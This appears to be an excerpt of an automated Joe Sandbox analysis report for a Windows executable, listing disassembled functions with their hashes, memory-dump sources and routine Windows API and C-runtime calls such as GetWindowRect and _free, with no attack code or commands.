                                    • Instruction ID: d9db0ddc9b15da707f292801f63fa44687d086f58fc0f5ae8ee23db32e37a269
                                    • Opcode Fuzzy Hash: dcad3ff3355eaa410b25e6cf6505ebf09517f6523d720f95d170c56cd33ab1f5
                                    • Instruction Fuzzy Hash: AA1215B17147068BC72ACF28C9D1AB9B3E0FF54309F50892DD997CBA91D374A898CB45
                                    Function 0034BE13 Relevance: .4, Instructions: 449COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a4e882376456da13d0eed3c9278cfe209a44d47289edbcdea851345c578dafbf
                                    • Instruction ID: ccf058c40fb45ad821cbaa118ce7430cbc0677393e84b6828d2bdea7dea18c55
                                    • Opcode Fuzzy Hash: a4e882376456da13d0eed3c9278cfe209a44d47289edbcdea851345c578dafbf
                                    • Instruction Fuzzy Hash: 47F1CA7562A3018FC79ACF28C48096EBBE5EFC9314F149A2EF4859B252D730E945CF42
                                    Function 00360B43 Relevance: .3, Instructions: 345COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction ID: b8e75eb97b510dd6eea128e2f58b7a9668e1ce2d21feac37abfa4f351de84b69
                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction Fuzzy Hash: 03C193762150A30ADF2F4639853603FBBA15AA27B131B875DD4B3CF1D8FE20D664DA20
                                    Function 00360F78 Relevance: .3, Instructions: 341COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction ID: c2752ab6e2372d4d97fcced55a60ff483f279659cd83c7b14a22e64d976b0534
                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction Fuzzy Hash: F2C1A2762151930ADF2E463AC53503FBBA15AA27B131F876DD4B3CB5C8FE20D664DA20
                                    Function 0036070E Relevance: .3, Instructions: 331COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                    • Instruction ID: 833fb46b5525271db47a3936b671b37bec1b370396b8b02963ee54e2d403ae2e
                                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                    • Instruction Fuzzy Hash: 82C1A4762051530ADF2E4639C57603FBBA15EA27B131B876DD4B3CB0D9FE20D664DA20
                                    Function 00356646 Relevance: .3, Instructions: 325COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: c801524508b69716376c0583446b354be67f5720f2f8b33d6ff9eaee7deaf98d
                                    • Instruction ID: 1b87f72f87f31969003f9bce01aa29df730a8c0f0c1306f6afdeac49965f4f5f
                                    • Opcode Fuzzy Hash: c801524508b69716376c0583446b354be67f5720f2f8b33d6ff9eaee7deaf98d
                                    • Instruction Fuzzy Hash: 0CD125B1A043418FDB16CF28C882B5BBBE0BF84309F45456DEC859B662D734E95CCB96
                                    Function 003602F6 Relevance: .3, Instructions: 323COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction ID: 900884dafdba21f2ce10fe70ac66b0a770e5d6900a8312f43d5dad136541b710
                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction Fuzzy Hash: 14C1B9762091530ADF2F463AC53603FBBA15AA27B131B876DD4B3CB1D9FE10D564DA20
                                    Function 0034E2A0 Relevance: .3, Instructions: 318COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 36cd1e6ce04e7a7cc9ec160a8d1a02a97ca3051ea561bd83c3513f176893f35e
                                    • Instruction ID: cab0d328ac2593fec65277ae73e2729197c72e72cb1e31bd375134029de6590a
                                    • Opcode Fuzzy Hash: 36cd1e6ce04e7a7cc9ec160a8d1a02a97ca3051ea561bd83c3513f176893f35e
                                    • Instruction Fuzzy Hash: A0E138755183848FC306CF29D49196ABBF0BF8A300F85099EF9D597392C335EA19DB62
                                    Function 00353A3C Relevance: .3, Instructions: 263COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                    • Instruction ID: f2e019e2db48fe3b43a9166a4392ae6e202a90d25f7c7167120c52943c16c376
                                    • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                    • Instruction Fuzzy Hash: 2B9168702447498BDB26EF68C890FBA77E5EB90341F10092DED978B292DA74E74CC742
                                    Function 00364969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e0fb905632f7de8fa4f2e060577effe299f870fbd26c017fb9c01934ee34a85c
                                    • Instruction ID: 811af76914915e6df7b25449f051289c42ec57be4da545a0f7c60ec1f1b34e7a
                                    • Opcode Fuzzy Hash: e0fb905632f7de8fa4f2e060577effe299f870fbd26c017fb9c01934ee34a85c
                                    • Instruction Fuzzy Hash: 7C618971E8070876DE3B9AA8D895BBF23D8DB02700F15CA19E883DF68DD651DD42C359
                                    Function 00353D6D Relevance: .2, Instructions: 232COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                    • Instruction ID: 73d2afdccf0cb3de04fda2c131422384a241d610f3d10f9503b9bc507becd718
                                    • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                    • Instruction Fuzzy Hash: 5C7149716043454BDB36DE68C8D1FAE77E4ABA0385F00092DFD868F292DA74DA8D8752
                                    Function 0036473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                    • Instruction ID: 3c290e70ff31b7df63f272e44a898fc293e0f86f54ad34f88a861e9fcef5b6f1
                                    • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                    • Instruction Fuzzy Hash: 7551AC70F00B845BDB3799688955BFF27DD9B53300F19C929E992DB68EC306ED418392
                                    Function 0034DE6C Relevance: .2, Instructions: 190COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 83d46a0eb9b16d9fb8190896605abfffd559bc94c7ece19bbfaf9e5a9707d923
                                    • Instruction ID: d97625ba3bc7a1596a69d8dce86f21af8d2196c40f226eed2ee8d52eddbc0337
                                    • Opcode Fuzzy Hash: 83d46a0eb9b16d9fb8190896605abfffd559bc94c7ece19bbfaf9e5a9707d923
                                    • Instruction Fuzzy Hash: 14818FA221D7D49DCB178F7D38A52B53FE95773340F2900EAC4C68A2A3D536499CE721
                                    Function 0034E8A0 Relevance: .2, Instructions: 154COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3f0624bdb911303c16bd666d63a2f52f8921e50211ec19205fccf559132ab001
                                    • Instruction ID: e28a68af6f3fd9169333195ba75dacf233b56dfb3c6068d8b3e383e34cdba321
                                    • Opcode Fuzzy Hash: 3f0624bdb911303c16bd666d63a2f52f8921e50211ec19205fccf559132ab001
                                    • Instruction Fuzzy Hash: FB51DF319083D24FC713CF24919446EBFE1BE9A718F5A489EE4D54F252D320E64ACB92
                                    Function 0034F968 Relevance: .1, Instructions: 131COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3556025a4a0a182b85787fd333121734c8b5bcb42d5be6fe646c51e9006ceabe
                                    • Instruction ID: 49ad135dbbf85386c9fedbc670e8a0d81bfec2256027599403970160b4b83b6a
                                    • Opcode Fuzzy Hash: 3556025a4a0a182b85787fd333121734c8b5bcb42d5be6fe646c51e9006ceabe
                                    • Instruction Fuzzy Hash: 46512571A083029FC748CF19D49059AF7E1FF88354F058A2EE899E7740DB34EA59CB96
                                    Function 003537C1 Relevance: .1, Instructions: 112COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                    • Instruction ID: 6a2eb9496aadaf896bf4fdf2102de823c9898fcc9b5b4cd1d6bb07ec60ffcf09
                                    • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                    • Instruction Fuzzy Hash: 4231F2B1A447458FCB25DF28C85166ABBE0FB95301F10492DE8E5CB742C739EA4DCB92
                                    Function 00345F3C Relevance: .1, Instructions: 76COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: db2b84e78e96028aebbce328002f261d468f46bf530efb089a62100d18e46a92
                                    • Instruction ID: 0a738d51b242bff35467485dcf66615c3459de2849d8889b1b81c972c486d601
                                    • Opcode Fuzzy Hash: db2b84e78e96028aebbce328002f261d468f46bf530efb089a62100d18e46a92
                                    • Instruction Fuzzy Hash: B9210A32A201218FCB59CF2DDCD0C3A7795A78A311B47816BEA46CB2D1C534F965CBA0
                                    Function 0034DA98 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 236COMMON
                                    Download Yara Rule
                                    APIs
                                    • _swprintf.LIBCMT ref: 0034DABE
                                      • Part of subcall function 0034400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0034401D
                                      • Part of subcall function 00351596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00380EE8,00000200,0034D202,00000000,?,00000050,00380EE8), ref: 003515B3
                                    • _strlen.LIBCMT ref: 0034DADF
                                    • SetDlgItemTextW.USER32(?,0037E154,?), ref: 0034DB3F
                                    • GetWindowRect.USER32(?,?), ref: 0034DB79
                                    • GetClientRect.USER32(?,?), ref: 0034DB85
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0034DC25
                                    • GetWindowRect.USER32(?,?), ref: 0034DC52
                                    • SetWindowTextW.USER32(?,?), ref: 0034DC95
                                    • GetSystemMetrics.USER32(00000008), ref: 0034DC9D
                                    • GetWindow.USER32(?,00000005), ref: 0034DCA8
                                    • GetWindowRect.USER32(00000000,?), ref: 0034DCD5
                                    • GetWindow.USER32(00000000,00000002), ref: 0034DD47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                    • String ID: I=u$$%s:$CAPTION$T7$d
                                    • API String ID: 2407758923-2040545954
                                    • Opcode ID: 647fe1b8c91c4d5e32397d8dcc2cce89db5446bb5684644319e341e19a1b3b03
                                    • Instruction ID: 1736d04ad78ea3352474d221a02abb2ab2a40897eb26614b1e7432d6e687d0ca
                                    • Opcode Fuzzy Hash: 647fe1b8c91c4d5e32397d8dcc2cce89db5446bb5684644319e341e19a1b3b03
                                    • Instruction Fuzzy Hash: 7281B071508301AFD712DF68CC89E6BBBE9EB89704F05491DFA8497250D670E809CB52
                                    Function 0036C233 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0036C277
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE2F
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE41
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE53
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE65
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE77
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE89
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BE9B
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BEAD
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BEBF
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BED1
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BEE3
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BEF5
                                      • Part of subcall function 0036BE12: _free.LIBCMT ref: 0036BF07
                                    • _free.LIBCMT ref: 0036C26C
                                      • Part of subcall function 003684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958), ref: 003684F4
                                      • Part of subcall function 003684DE: GetLastError.KERNEL32(00373958,?,0036BFA7,00373958,00000000,00373958,00000000,?,0036BFCE,00373958,00000007,00373958,?,0036C3CB,00373958,00373958), ref: 00368506
                                    • _free.LIBCMT ref: 0036C28E
                                    • _free.LIBCMT ref: 0036C2A3
                                    • _free.LIBCMT ref: 0036C2AE
                                    • _free.LIBCMT ref: 0036C2D0
                                    • _free.LIBCMT ref: 0036C2E3
